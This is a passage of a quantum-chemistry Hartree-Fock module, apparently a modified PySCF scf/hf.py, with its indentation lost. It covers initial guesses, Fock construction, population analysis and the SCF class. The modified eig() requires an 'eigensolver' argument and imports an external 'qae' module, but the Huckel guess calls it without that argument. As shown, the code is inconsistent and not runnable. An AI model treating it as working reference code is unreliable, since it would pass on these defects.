# reasonable AO-character contraction. The ANO valence AO should have
# significant overlap to ECP basis if the ECP basis has AO-character.
atm1 = gto.Mole()
atm2 = gto.Mole()
atom = [[symb, (0.,0.,0.)]]
atm1._atm, atm1._bas, atm1._env = atm1.make_env(atom, {symb:basis4ecp}, [])
atm2._atm, atm2._bas, atm2._env = atm2.make_env(atom, {symb:basis_ano}, [])
atm1._built = True
atm2._built = True
s12 = gto.intor_cross('int1e_ovlp', atm1, atm2)
if abs(numpy.linalg.det(s12[occ4ecp>0][:,occ>0])) > .1:
occ, basis_ano = occ4ecp, basis4ecp
else:
logger.debug(mol, 'Density of valence part of ANO basis '
'will be used as initial guess for %s', symb)
return occ, basis_ano
# Issue 548
if any(gto.charge(mol.atom_symbol(ia)) > 96 for ia in range(mol.natm)):
logger.info(mol, 'MINAO initial guess is not available for super-heavy '
'elements. "atom" initial guess is used.')
return init_guess_by_atom(mol)
nelec_ecp_dic = dict([(mol.atom_symbol(ia), mol.atom_nelec_core(ia))
for ia in range(mol.natm)])
basis = {}
occdic = {}
for symb, nelec_ecp in nelec_ecp_dic.items():
occ_add, basis_add = minao_basis(symb, nelec_ecp)
occdic[symb] = occ_add
basis[symb] = basis_add
occ = []
new_atom = []
for ia in range(mol.natm):
symb = mol.atom_symbol(ia)
if not gto.is_ghost_atom(symb):
occ.append(occdic[symb])
new_atom.append(mol._atom[ia])
occ = numpy.hstack(occ)
pmol = gto.Mole()
pmol._atm, pmol._bas, pmol._env = pmol.make_env(new_atom, basis, [])
pmol._built = True
dm = addons.project_dm_nr2nr(pmol, numpy.diag(occ), mol)
# normalize eletron number
# s = mol.intor_symmetric('int1e_ovlp')
# dm *= mol.nelectron / (dm*s).sum()
return dm
def init_guess_by_1e(mol):
'''Generate initial guess density matrix from core hamiltonian
Returns:
Density matrix, 2D ndarray
'''
mf = RHF(mol)
return mf.init_guess_by_1e(mol)
def init_guess_by_atom(mol):
'''Generate initial guess density matrix from superposition of atomic HF
density matrix. The atomic HF is occupancy averaged RHF
Returns:
Density matrix, 2D ndarray
'''
from pyscf.scf import atom_hf
atm_scf = atom_hf.get_atm_nrhf(mol)
aoslice = mol.aoslice_by_atom()
atm_dms = []
for ia in range(mol.natm):
symb = mol.atom_symbol(ia)
if symb not in atm_scf:
symb = mol.atom_pure_symbol(ia)
if symb in atm_scf:
e_hf, e, c, occ = atm_scf[symb]
dm = numpy.dot(c*occ, c.conj().T)
else: # symb's basis is not specified in the input
nao_atm = aoslice[ia,3] - aoslice[ia,2]
dm = numpy.zeros((nao_atm, nao_atm))
atm_dms.append(dm)
dm = scipy.linalg.block_diag(*atm_dms)
if mol.cart:
cart2sph = mol.cart2sph_coeff(normalized='sp')
dm = reduce(numpy.dot, (cart2sph, dm, cart2sph.T))
for k, v in atm_scf.items():
logger.debug1(mol, 'Atom %s, E = %.12g', k, v[0])
return dm
def init_guess_by_huckel(mol):
'''Generate initial guess density matrix from a Huckel calculation based
on occupancy averaged atomic RHF calculations, doi:10.1021/acs.jctc.8b01089
Returns:
Density matrix, 2D ndarray
'''
mo_energy, mo_coeff = _init_guess_huckel_orbitals(mol)
mo_occ = get_occ(SCF(mol), mo_energy, mo_coeff)
return make_rdm1(mo_coeff, mo_occ)
def _init_guess_huckel_orbitals(mol):
'''Generate initial guess density matrix from a Huckel calculation based
on occupancy averaged atomic RHF calculations, doi:10.1021/acs.jctc.8b01089
Returns:
An 1D array for Huckel orbital energies and an 2D array for orbital coefficients
'''
from pyscf.scf import atom_hf
atm_scf = atom_hf.get_atm_nrhf(mol)
# GWH parameter value
Kgwh = 1.75
# Run atomic SCF calculations to get orbital energies, coefficients and occupations
at_e = []
at_c = []
at_occ = []
for ia in range(mol.natm):
symb = mol.atom_symbol(ia)
if symb not in atm_scf:
symb = mol.atom_pure_symbol(ia)
e_hf, e, c, occ = atm_scf[symb]
at_c.append(c)
at_e.append(e)
at_occ.append(occ)
# Count number of occupied orbitals
nocc = 0
for ia in range(mol.natm):
for iorb in range(len(at_occ[ia])):
if(at_occ[ia][iorb]>0.0):
nocc=nocc+1
# Number of basis functions
nbf = mol.nao_nr()
# Collect AO coefficients and energies
orb_E = numpy.zeros(nocc)
orb_C = numpy.zeros((nbf,nocc))
# Atomic basis info
aoslice = mol.aoslice_by_atom()
iocc = 0
for ia in range(mol.natm):
# First and last bf index
abeg = aoslice[ia, 2]
aend = aoslice[ia, 3]
for iorb in range(len(at_occ[ia])):
if(at_occ[ia][iorb]>0.0):
orb_C[abeg:aend,iocc] = at_c[ia][:,iorb]
orb_E[iocc] = at_e[ia][iorb]
iocc=iocc+1
# Overlap matrix
S = get_ovlp(mol)
# Atomic orbital overlap
orb_S = orb_C.transpose().dot(S).dot(orb_C)
# Build Huckel matrix
orb_H = numpy.zeros((nocc,nocc))
for io in range(nocc):
# Diagonal is just the orbital energies
orb_H[io,io] = orb_E[io]
for jo in range(io):
# Off-diagonal is given by GWH approximation
orb_H[io,jo] = 0.5*Kgwh*orb_S[io,jo]*(orb_E[io]+orb_E[jo])
orb_H[jo,io] = orb_H[io,jo]
# Energies and coefficients in the minimal orbital basis
mo_E, atmo_C = eig(orb_H, orb_S)
# and in the AO basis
mo_C = orb_C.dot(atmo_C)
return mo_E, mo_C
def init_guess_by_chkfile(mol, chkfile_name, project=None):
'''Read the HF results from checkpoint file, then project it to the
basis defined by ``mol``
Returns:
Density matrix, 2D ndarray
'''
from pyscf.scf import uhf
dm = uhf.init_guess_by_chkfile(mol, chkfile_name, project)
return dm[0] + dm[1]
def get_init_guess(mol, key='minao'):
'''Generate density matrix for initial guess
Kwargs:
key : str
One of 'minao', 'atom', 'huckel', 'hcore', '1e', 'chkfile'.
'''
return RHF(mol).get_init_guess(mol, key)
# eigenvalue of d is 1
def level_shift(s, d, f, factor):
r'''Apply level shift :math:`\Delta` to virtual orbitals
.. math::
:nowrap:
\begin{align}
FC &= SCE \\
F &= F + SC \Lambda C^\dagger S \\
\Lambda_{ij} &=
\begin{cases}
\delta_{ij}\Delta & i \in \text{virtual} \\
0 & \text{otherwise}
\end{cases}
\end{align}
Returns:
New Fock matrix, 2D ndarray
'''
dm_vir = s - reduce(numpy.dot, (s, d, s))
return f + dm_vir * factor
def damping(s, d, f, factor):
#dm_vir = s - reduce(numpy.dot, (s,d,s))
#sinv = numpy.linalg.inv(s)
#f0 = reduce(numpy.dot, (dm_vir, sinv, f, d, s))
dm_vir = numpy.eye(s.shape[0]) - numpy.dot(s, d)
f0 = reduce(numpy.dot, (dm_vir, f, d, s))
f0 = (f0+f0.conj().T) * (factor/(factor+1.))
return f - f0
# full density matrix for RHF
def make_rdm1(mo_coeff, mo_occ, **kwargs):
'''One-particle density matrix in AO representation
Args:
mo_coeff : 2D ndarray
Orbital coefficients. Each column is one orbital.
mo_occ : 1D ndarray
Occupancy
'''
mocc = mo_coeff[:,mo_occ>0]
# DO NOT make tag_array for dm1 here because this DM array may be modified and
# passed to functions like get_jk, get_vxc. These functions may take the tags
# (mo_coeff, mo_occ) to compute the potential if tags were found in the DM
# array and modifications to DM array may be ignored.
return numpy.dot(mocc*mo_occ[mo_occ>0], mocc.conj().T)
################################################
# for general DM
# hermi = 0 : arbitary
# hermi = 1 : hermitian
# hermi = 2 : anti-hermitian
################################################
def dot_eri_dm(eri, dm, hermi=0, with_j=True, with_k=True):
'''Compute J, K matrices in terms of the given 2-electron integrals and
density matrix:
J ~ numpy.einsum('pqrs,qp->rs', eri, dm)
K ~ numpy.einsum('pqrs,qr->ps', eri, dm)
Args:
eri : ndarray
8-fold or 4-fold ERIs or complex integral array with N^4 elements
(N is the number of orbitals)
dm : ndarray or list of ndarrays
A density matrix or a list of density matrices
Kwargs:
hermi : int
Whether J, K matrix is hermitian
| 0 : no hermitian or symmetric
| 1 : hermitian
| 2 : anti-hermitian
Returns:
Depending on the given dm, the function returns one J and one K matrix,
or a list of J matrices and a list of K matrices, corresponding to the
input density matrices.
Examples:
>>> from pyscf import gto, scf
>>> from pyscf.scf import _vhf
>>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1')
>>> eri = _vhf.int2e_sph(mol._atm, mol._bas, mol._env)
>>> dms = numpy.random.random((3,mol.nao_nr(),mol.nao_nr()))
>>> j, k = scf.hf.dot_eri_dm(eri, dms, hermi=0)
>>> print(j.shape)
(3, 2, 2)
'''
dm = numpy.asarray(dm)
nao = dm.shape[-1]
if eri.dtype == numpy.complex128 or eri.size == nao**4:
eri = eri.reshape((nao,)*4)
dms = dm.reshape(-1,nao,nao)
vj = vk = None
if with_j:
vj = numpy.einsum('ijkl,xji->xkl', eri, dms)
vj = vj.reshape(dm.shape)
if with_k:
vk = numpy.einsum('ijkl,xjk->xil', eri, dms)
vk = vk.reshape(dm.shape)
else:
vj, vk = _vhf.incore(eri, dm.real, hermi, with_j, with_k)
if dm.dtype == numpy.complex128:
vs = _vhf.incore(eri, dm.imag, 0, with_j, with_k)
if with_j:
vj = vj + vs[0] * 1j
if with_k:
vk = vk + vs[1] * 1j
return vj, vk
def get_jk(mol, dm, hermi=1, vhfopt=None, with_j=True, with_k=True, omega=None):
'''Compute J, K matrices for all input density matrices
Args:
mol : an instance of :class:`Mole`
dm : ndarray or list of ndarrays
A density matrix or a list of density matrices
Kwargs:
hermi : int
Whether J, K matrix is hermitian
| 0 : not hermitian and not symmetric
| 1 : hermitian or symmetric
| 2 : anti-hermitian
vhfopt :
A class which holds precomputed quantities to optimize the
computation of J, K matrices
with_j : boolean
Whether to compute J matrices
with_k : boolean
Whether to compute K matrices
omega : float
Parameter of range-seperated Coulomb operator: erf( omega * r12 ) / r12.
If specified, integration are evaluated based on the long-range
part of the range-seperated Coulomb operator.
Returns:
Depending on the given dm, the function returns one J and one K matrix,
or a list of J matrices and a list of K matrices, corresponding to the
input density matrices.
Examples:
>>> from pyscf import gto, scf
>>> from pyscf.scf import _vhf
>>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1')
>>> dms = numpy.random.random((3,mol.nao_nr(),mol.nao_nr()))
>>> j, k = scf.hf.get_jk(mol, dms, hermi=0)
>>> print(j.shape)
(3, 2, 2)
'''
dm = numpy.asarray(dm, order='C')
dm_shape = dm.shape
dm_dtype = dm.dtype
nao = dm_shape[-1]
if dm_dtype == numpy.complex128:
dm = numpy.vstack((dm.real, dm.imag)).reshape(-1,nao,nao)
hermi = 0
if omega is None:
vj, vk = _vhf.direct(dm, mol._atm, mol._bas, mol._env,
vhfopt, hermi, mol.cart, with_j, with_k)
else:
# The vhfopt of standard Coulomb operator can be used here as an approximate
# integral prescreening conditioner since long-range part Coulomb is always
# smaller than standard Coulomb. It's safe to filter LR integrals with the
# integral estimation from standard Coulomb.
with mol.with_range_coulomb(omega):
vj, vk = _vhf.direct(dm, mol._atm, mol._bas, mol._env,
vhfopt, hermi, mol.cart, with_j, with_k)
if dm_dtype == numpy.complex128:
if with_j:
vj = vj.reshape(2,-1)
vj = vj[0] + vj[1] * 1j
vj = vj.reshape(dm_shape)
if with_k:
vk = vk.reshape(2,-1)
vk = vk[0] + vk[1] * 1j
vk = vk.reshape(dm_shape)
return vj, vk
def get_veff(mol, dm, dm_last=None, vhf_last=None, hermi=1, vhfopt=None):
'''Hartree-Fock potential matrix for the given density matrix
Args:
mol : an instance of :class:`Mole`
dm : ndarray or list of ndarrays
A density matrix or a list of density matrices
Kwargs:
dm_last : ndarray or a list of ndarrays or 0
The density matrix baseline. If not 0, this function computes the
increment of HF potential w.r.t. the reference HF potential matrix.
vhf_last : ndarray or a list of ndarrays or 0
The reference HF potential matrix.
hermi : int
Whether J, K matrix is hermitian
| 0 : no hermitian or symmetric
| 1 : hermitian
| 2 : anti-hermitian
vhfopt :
A class which holds precomputed quantities to optimize the
computation of J, K matrices
Returns:
matrix Vhf = 2*J - K. Vhf can be a list matrices, corresponding to the
input density matrices.
Examples:
>>> import numpy
>>> from pyscf import gto, scf
>>> from pyscf.scf import _vhf
>>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1')
>>> dm0 = numpy.random.random((mol.nao_nr(),mol.nao_nr()))
>>> vhf0 = scf.hf.get_veff(mol, dm0, hermi=0)
>>> dm1 = numpy.random.random((mol.nao_nr(),mol.nao_nr()))
>>> vhf1 = scf.hf.get_veff(mol, dm1, hermi=0)
>>> vhf2 = scf.hf.get_veff(mol, dm1, dm_last=dm0, vhf_last=vhf0, hermi=0)
>>> numpy.allclose(vhf1, vhf2)
True
'''
if dm_last is None:
vj, vk = get_jk(mol, numpy.asarray(dm), hermi, vhfopt)
return vj - vk * .5
else:
ddm = numpy.asarray(dm) - numpy.asarray(dm_last)
vj, vk = get_jk(mol, ddm, hermi, vhfopt)
return vj - vk * .5 + numpy.asarray(vhf_last)
def get_fock(mf, h1e=None, s1e=None, vhf=None, dm=None, cycle=-1, diis=None,
diis_start_cycle=None, level_shift_factor=None, damp_factor=None):
'''F = h^{core} + V^{HF}
Special treatment (damping, DIIS, or level shift) will be applied to the
Fock matrix if diis and cycle is specified (The two parameters are passed
to get_fock function during the SCF iteration)
Kwargs:
h1e : 2D ndarray
Core hamiltonian
s1e : 2D ndarray
Overlap matrix, for DIIS
vhf : 2D ndarray
HF potential matrix
dm : 2D ndarray
Density matrix, for DIIS
cycle : int
Then present SCF iteration step, for DIIS
diis : an object of :attr:`SCF.DIIS` class
DIIS object to hold intermediate Fock and error vectors
diis_start_cycle : int
The step to start DIIS. Default is 0.
level_shift_factor : float or int
Level shift (in AU) for virtual space. Default is 0.
'''
if h1e is None: h1e = mf.get_hcore()
if vhf is None: vhf = mf.get_veff(mf.mol, dm)
f = h1e + vhf
if cycle < 0 and diis is None: # Not inside the SCF iteration
return f
if diis_start_cycle is None:
diis_start_cycle = mf.diis_start_cycle
if level_shift_factor is None:
level_shift_factor = mf.level_shift
if damp_factor is None:
damp_factor = mf.damp
if s1e is None: s1e = mf.get_ovlp()
if dm is None: dm = mf.make_rdm1()
if 0 <= cycle < diis_start_cycle-1 and abs(damp_factor) > 1e-4:
f = damping(s1e, dm*.5, f, damp_factor)
if diis is not None and cycle >= diis_start_cycle:
f = diis.update(s1e, dm, f, mf, h1e, vhf)
if abs(level_shift_factor) > 1e-4:
f = level_shift(s1e, dm*.5, f, level_shift_factor)
return f
def get_occ(mf, mo_energy=None, mo_coeff=None):
'''Label the occupancies for each orbital
Kwargs:
mo_energy : 1D ndarray
Obital energies
mo_coeff : 2D ndarray
Obital coefficients
Examples:
>>> from pyscf import gto, scf
>>> mol = gto.M(atom='H 0 0 0; F 0 0 1.1')
>>> mf = scf.hf.SCF(mol)
>>> energy = numpy.array([-10., -1., 1, -2., 0, -3])
>>> mf.get_occ(energy)
array([2, 2, 0, 2, 2, 2])
'''
if mo_energy is None: mo_energy = mf.mo_energy
e_idx = numpy.argsort(mo_energy)
e_sort = mo_energy[e_idx]
nmo = mo_energy.size
mo_occ = numpy.zeros(nmo)
nocc = mf.mol.nelectron // 2
mo_occ[e_idx[:nocc]] = 2
if mf.verbose >= logger.INFO and nocc < nmo:
if e_sort[nocc-1]+1e-3 > e_sort[nocc]:
logger.warn(mf, 'HOMO %.15g == LUMO %.15g',
e_sort[nocc-1], e_sort[nocc])
else:
logger.info(mf, ' HOMO = %.15g LUMO = %.15g',
e_sort[nocc-1], e_sort[nocc])
if mf.verbose >= logger.DEBUG:
numpy.set_printoptions(threshold=nmo)
logger.debug(mf, ' mo_energy =\n%s', mo_energy)
numpy.set_printoptions(threshold=1000)
return mo_occ
def get_grad(mo_coeff, mo_occ, fock_ao):
'''RHF orbital gradients
Args:
mo_coeff : 2D ndarray
Obital coefficients
mo_occ : 1D ndarray
Orbital occupancy
fock_ao : 2D ndarray
Fock matrix in AO representation
Returns:
Gradients in MO representation. It's a num_occ*num_vir vector.
'''
occidx = mo_occ > 0
viridx = ~occidx
g = reduce(numpy.dot, (mo_coeff[:,viridx].conj().T, fock_ao,
mo_coeff[:,occidx])) * 2
return g.ravel()
def analyze(mf, verbose=logger.DEBUG, with_meta_lowdin=WITH_META_LOWDIN,
**kwargs):
'''Analyze the given SCF object: print orbital energies, occupancies;
print orbital coefficients; Mulliken population analysis; Diople moment.
'''
from pyscf.lo import orth
from pyscf.tools import dump_mat
mo_energy = mf.mo_energy
mo_occ = mf.mo_occ
mo_coeff = mf.mo_coeff
log = logger.new_logger(mf, verbose)
if log.verbose >= logger.NOTE:
mf.dump_scf_summary(log)
log.note('**** MO energy ****')
for i,c in enumerate(mo_occ):
log.note('MO #%-3d energy= %-18.15g occ= %g', i+MO_BASE,
mo_energy[i], c)
ovlp_ao = mf.get_ovlp()
if verbose >= logger.DEBUG:
label = mf.mol.ao_labels()
if with_meta_lowdin:
log.debug(' ** MO coefficients (expansion on meta-Lowdin AOs) **')
orth_coeff = orth.orth_ao(mf.mol, 'meta_lowdin', s=ovlp_ao)
c = reduce(numpy.dot, (orth_coeff.conj().T, ovlp_ao, mo_coeff))
else:
log.debug(' ** MO coefficients (expansion on AOs) **')
c = mo_coeff
dump_mat.dump_rec(mf.stdout, c, label, start=MO_BASE, **kwargs)
dm = mf.make_rdm1(mo_coeff, mo_occ)
if with_meta_lowdin:
return (mf.mulliken_meta(mf.mol, dm, s=ovlp_ao, verbose=log),
mf.dip_moment(mf.mol, dm, verbose=log))
else:
return (mf.mulliken_pop(mf.mol, dm, s=ovlp_ao, verbose=log),
mf.dip_moment(mf.mol, dm, verbose=log))
def dump_scf_summary(mf, verbose=logger.DEBUG):
if not mf.scf_summary:
return
log = logger.new_logger(mf, verbose)
summary = mf.scf_summary
def write(fmt, key):
if key in summary:
log.info(fmt, summary[key])
log.info('**** SCF Summaries ****')
log.info('Total Energy = %24.15f', mf.e_tot)
write('Nuclear Repulsion Energy = %24.15f', 'nuc')
write('One-electron Energy = %24.15f', 'e1')
write('Two-electron Energy = %24.15f', 'e2')
write('Two-electron Coulomb Energy = %24.15f', 'coul')
write('DFT Exchange-Correlation Energy = %24.15f', 'exc')
write('Empirical Dispersion Energy = %24.15f', 'dispersion')
write('PCM Polarization Energy = %24.15f', 'epcm')
write('EFP Energy = %24.15f', 'efp')
if getattr(mf, 'entropy', None):
log.info('(Electronic) Entropy %24.15f', mf.entropy)
log.info('(Electronic) Zero Point Energy %24.15f', mf.e_zero)
log.info('Free Energy = %24.15f', mf.e_free)
def mulliken_pop(mol, dm, s=None, verbose=logger.DEBUG):
r'''Mulliken population analysis
.. math:: M_{ij} = D_{ij} S_{ji}
Mulliken charges
.. math:: \delta_i = \sum_j M_{ij}
Returns:
A list : pop, charges
pop : nparray
Mulliken population on each atomic orbitals
charges : nparray
Mulliken charges
'''
if s is None: s = get_ovlp(mol)
log = logger.new_logger(mol, verbose)
if isinstance(dm, numpy.ndarray) and dm.ndim == 2:
pop = numpy.einsum('ij,ji->i', dm, s).real
else: # ROHF
pop = numpy.einsum('ij,ji->i', dm[0]+dm[1], s).real
log.info(' ** Mulliken pop **')
for i, s in enumerate(mol.ao_labels()):
log.info('pop of %s %10.5f', s, pop[i])
log.note(' ** Mulliken atomic charges **')
chg = numpy.zeros(mol.natm)
for i, s in enumerate(mol.ao_labels(fmt=None)):
chg[s[0]] += pop[i]
chg = mol.atom_charges() - chg
for ia in range(mol.natm):
symb = mol.atom_symbol(ia)
log.note('charge of %d%s = %10.5f', ia, symb, chg[ia])
return pop, chg
def mulliken_meta(mol, dm, verbose=logger.DEBUG,
pre_orth_method=PRE_ORTH_METHOD, s=None):
'''Mulliken population analysis, based on meta-Lowdin AOs.
In the meta-lowdin, the AOs are grouped in three sets: core, valence and
Rydberg, the orthogonalization are carreid out within each subsets.
Args:
mol : an instance of :class:`Mole`
dm : ndarray or 2-item list of ndarray
Density matrix. ROHF dm is a 2-item list of 2D array
Kwargs:
verbose : int or instance of :class:`lib.logger.Logger`
pre_orth_method : str
Pre-orthogonalization, which localized GTOs for each atom.
To obtain the occupied and unoccupied atomic shells, there are
three methods
| 'ano' : Project GTOs to ANO basis
| 'minao' : Project GTOs to MINAO basis
| 'scf' : Symmetry-averaged fractional occupation atomic RHF
Returns:
A list : pop, charges
pop : nparray
Mulliken population on each atomic orbitals
charges : nparray
Mulliken charges
'''
from pyscf.lo import orth
if s is None: s = get_ovlp(mol)
log = logger.new_logger(mol, verbose)
orth_coeff = orth.orth_ao(mol, 'meta_lowdin', pre_orth_method, s=s)
c_inv = numpy.dot(orth_coeff.conj().T, s)
if isinstance(dm, numpy.ndarray) and dm.ndim == 2:
dm = reduce(numpy.dot, (c_inv, dm, c_inv.T.conj()))
else: # ROHF
dm = reduce(numpy.dot, (c_inv, dm[0]+dm[1], c_inv.T.conj()))
log.info(' ** Mulliken pop on meta-lowdin orthogonal AOs **')
return mulliken_pop(mol, dm, numpy.eye(orth_coeff.shape[0]), log)
mulliken_pop_meta_lowdin_ao = mulliken_meta
def eig(h, s, eigensolver):
'''Solver for generalized eigenvalue problem
.. math:: HC = SCE
'''
import qae
# print()
# print('=============================================================')
# print()
# print('H:')
# print(h)
# print('S:')
# print(s)
# print()
# print(f'Eigensolver: {eigensolver}')
# print()
if eigensolver == 'QAE':
e, c = qae.solve(h, s,nev=h.shape[0])
else:
e, c = scipy.linalg.eigh(h, s)
# print('E:')
# print(e)
# print('C:')
# print(c)
# print()
idx = numpy.argmax(abs(c.real), axis=0)
c[:,c[idx,numpy.arange(len(e))].real<0] *= -1
return e, c
def canonicalize(mf, mo_coeff, mo_occ, fock=None):
'''Canonicalization diagonalizes the Fock matrix within occupied, open,
virtual subspaces separatedly (without change occupancy).
'''
if fock is None:
dm = mf.make_rdm1(mo_coeff, mo_occ)
fock = mf.get_fock(dm=dm)
coreidx = mo_occ == 2
viridx = mo_occ == 0
openidx = ~(coreidx | viridx)
mo = numpy.empty_like(mo_coeff)
mo_e = numpy.empty(mo_occ.size)
for idx in (coreidx, openidx, viridx):
if numpy.count_nonzero(idx) > 0:
orb = mo_coeff[:,idx]
f1 = reduce(numpy.dot, (orb.conj().T, fock, orb))
e, c = scipy.linalg.eigh(f1)
mo[:,idx] = numpy.dot(orb, c)
mo_e[idx] = e
return mo_e, mo
def dip_moment(mol, dm, unit='Debye', verbose=logger.NOTE, **kwargs):
r''' Dipole moment calculation
.. math::
\mu_x = -\sum_{\mu}\sum_{\nu} P_{\mu\nu}(\nu|x|\mu) + \sum_A Q_A X_A\\
\mu_y = -\sum_{\mu}\sum_{\nu} P_{\mu\nu}(\nu|y|\mu) + \sum_A Q_A Y_A\\
\mu_z = -\sum_{\mu}\sum_{\nu} P_{\mu\nu}(\nu|z|\mu) + \sum_A Q_A Z_A
where :math:`\mu_x, \mu_y, \mu_z` are the x, y and z components of dipole
moment
Args:
mol: an instance of :class:`Mole`
dm : a 2D ndarrays density matrices
Return:
A list: the dipole moment on x, y and z component
'''
log = logger.new_logger(mol, verbose)
if 'unit_symbol' in kwargs: # pragma: no cover
log.warn('Kwarg "unit_symbol" was deprecated. It was replaced by kwarg '
'unit since PySCF-1.5.')
unit = kwargs['unit_symbol']
if not (isinstance(dm, numpy.ndarray) and dm.ndim == 2):
# UHF denisty matrices
dm = dm[0] + dm[1]
with mol.with_common_orig((0,0,0)):
ao_dip = mol.intor_symmetric('int1e_r', comp=3)
el_dip = numpy.einsum('xij,ji->x', ao_dip, dm).real
charges = mol.atom_charges()
coords = mol.atom_coords()
nucl_dip = numpy.einsum('i,ix->x', charges, coords)
mol_dip = nucl_dip - el_dip
if unit.upper() == 'DEBYE':
mol_dip *= nist.AU2DEBYE
log.note('Dipole moment(X, Y, Z, Debye): %8.5f, %8.5f, %8.5f', *mol_dip)
else:
log.note('Dipole moment(X, Y, Z, A.U.): %8.5f, %8.5f, %8.5f', *mol_dip)
return mol_dip
def uniq_var_indices(mo_occ):
'''
Indicies of the unique variables for the orbital-gradients (or
orbital-rotation) matrix.
'''
occidxa = mo_occ>0
occidxb = mo_occ==2
viridxa = ~occidxa
viridxb = ~occidxb
mask = (viridxa[:,None] & occidxa) | (viridxb[:,None] & occidxb)
return mask
def pack_uniq_var(x, mo_occ):
'''
Extract the unique variables from the full orbital-gradients (or
orbital-rotation) matrix
'''
idx = uniq_var_indices(mo_occ)
return x[idx]
def unpack_uniq_var(dx, mo_occ):
'''
Fill the full orbital-gradients (or orbital-rotation) matrix with the
unique variables.
'''
nmo = len(mo_occ)
idx = uniq_var_indices(mo_occ)
x1 = numpy.zeros((nmo,nmo), dtype=dx.dtype)
x1[idx] = dx
return x1 - x1.conj().T
def as_scanner(mf):
'''Generating a scanner/solver for HF PES.
The returned solver is a function. This function requires one argument
"mol" as input and returns total HF energy.
The solver will automatically use the results of last calculation as the
initial guess of the new calculation. All parameters assigned in the
SCF object (DIIS, conv_tol, max_memory etc) are automatically applied in
the solver.
Note scanner has side effects. It may change many underlying objects
(_scf, with_df, with_x2c, ...) during calculation.
Examples:
>>> from pyscf import gto, scf
>>> hf_scanner = scf.RHF(gto.Mole().set(verbose=0)).as_scanner()
>>> hf_scanner(gto.M(atom='H 0 0 0; F 0 0 1.1'))
-98.552190448277955
>>> hf_scanner(gto.M(atom='H 0 0 0; F 0 0 1.5'))
-98.414750424294368
'''
if isinstance(mf, lib.SinglePointScanner):
return mf
logger.info(mf, 'Create scanner for %s', mf.__class__)
class SCF_Scanner(mf.__class__, lib.SinglePointScanner):
def __init__(self, mf_obj):
self.__dict__.update(mf_obj.__dict__)
def __call__(self, mol_or_geom, **kwargs):
if isinstance(mol_or_geom, gto.Mole):
mol = mol_or_geom
else:
mol = self.mol.set_geom_(mol_or_geom, inplace=False)
# Cleanup intermediates associated to the pervious mol object
self.reset(mol)
if 'dm0' in kwargs:
dm0 = kwargs.pop('dm0')
elif self.mo_coeff is None:
dm0 = None
elif self.chkfile and h5py.is_hdf5(self.chkfile):
dm0 = self.from_chk(self.chkfile)
else:
dm0 = self.make_rdm1()
# dm0 form last calculation cannot be used in the current
# calculation if a completely different system is given.
# Obviously, the systems are very different if the number of
# basis functions are different.
# TODO: A robust check should include more comparison on
# various attributes between current `mol` and the `mol` in
# last calculation.
if dm0.shape[-1] != mol.nao:
#TODO:
#from pyscf.scf import addons
#if numpy.any(last_mol.atom_charges() != mol.atom_charges()):
# dm0 = None
#elif non-relativistic:
# addons.project_dm_nr2nr(last_mol, dm0, last_mol)
#else:
# addons.project_dm_r2r(last_mol, dm0, last_mol)
dm0 = None
self.mo_coeff = None # To avoid last mo_coeff being used by SOSCF
e_tot = self.kernel(dm0=dm0, **kwargs)
return e_tot
return SCF_Scanner(mf)
############
class SCF(lib.StreamObject):
'''SCF base class. non-relativistic RHF.
Attributes:
verbose : int
Print level. Default value equals to :class:`Mole.verbose`
max_memory : float or int
Allowed memory in MB. Default equals to :class:`Mole.max_memory`
chkfile : str
checkpoint file to save MOs, orbital energies etc. Writing to
chkfile can be disabled if this attribute is set to None or False.
conv_tol : float
converge threshold. Default is 1e-9
conv_tol_grad : float
gradients converge threshold. Default is sqrt(conv_tol)
max_cycle : int
max number of iterations. If max_cycle <= 0, SCF iteration will
be skiped and the kernel function will compute only the total
energy based on the intial guess. Default value is 50.
init_guess : str
initial guess method. It can be one of 'minao', 'atom', 'huckel', 'hcore', '1e', 'chkfile'.
Default is 'minao'
DIIS : DIIS class
The class to generate diis object. It can be one of
diis.SCF_DIIS, diis.ADIIS, diis.EDIIS.
diis : boolean or object of DIIS class defined in :mod:`scf.diis`.
Default is the object associated to the attribute :attr:`self.DIIS`.
Set it to None/False to turn off DIIS.
Note if this attribute is inialized as a DIIS object, the SCF driver
will use this object in the iteration. The DIIS informations (vector
basis and error vector) will be held inside this object. When kernel
function is called again, the old states (vector basis and error
vector) will be reused.
diis_space : int
DIIS space size. By default, 8 Fock matrices and errors vector are stored.
diis_start_cycle : int
The step to start DIIS. Default is 1.
diis_file: 'str'
File to store DIIS vectors and error vectors.
level_shift : float or int
Level shift (in AU) for virtual space. Default is 0.
direct_scf : bool
Direct SCF is used by default.
direct_scf_tol : float
Direct SCF cutoff threshold. Default is 1e-13.
callback : function(envs_dict) => None
callback function takes one dict as the argument which is
generated by the builtin function :func:`locals`, so that the
callback function can access all local variables in the current
envrionment.
conv_check : bool
An extra cycle to check convergence after SCF iterations.
check_convergence : function(envs) => bool
A hook for overloading convergence criteria in SCF iterations.
Saved results:
converged : bool
SCF converged or not
e_tot : float
Total HF energy (electronic energy plus nuclear repulsion)
mo_energy :
Orbital energies
mo_occ
Orbital occupancy
mo_coeff
Orbital coefficients
Examples:
>>> mol = gto.M(atom='H 0 0 0; H 0 0 1.1', basis='cc-pvdz')
>>> mf = scf.hf.SCF(mol)
>>> mf.verbose = 0
>>> mf.level_shift = .4
>>> mf.scf()
-1.0811707843775884
'''
conv_tol = getattr(__config__, 'scf_hf_SCF_conv_tol', 1e-9)
conv_tol_grad = getattr(__config__, 'scf_hf_SCF_conv_tol_grad', None)
max_cycle = getattr(__config__, 'scf_hf_SCF_max_cycle', 50)
init_guess = getattr(__config__, 'scf_hf_SCF_init_guess', 'minao')
# To avoid diis pollution form previous run, self.diis should not be
# initialized as DIIS instance here
DIIS = diis.SCF_DIIS
diis = getattr(__config__, 'scf_hf_SCF_diis', True)
diis_space = getattr(__config__, 'scf_hf_SCF_diis_space', 8)
# need > 0 if initial DM is numpy.zeros array
diis_start_cycle = getattr(__config__, 'scf_hf_SCF_diis_start_cycle', 1)
diis_file = None
# Give diis_space_rollback=True a trial if all other methods do not converge
diis_space_rollback = False
damp = getattr(__config__, 'scf_hf_SCF_damp', 0)
level_shift = getattr(__config__, 'scf_hf_SCF_level_shift', 0)
direct_scf = getattr(__config__, 'scf_hf_SCF_direct_scf', True)
direct_scf_tol = getattr(__config__, 'scf_hf_SCF_direct_scf_tol', 1e-13)
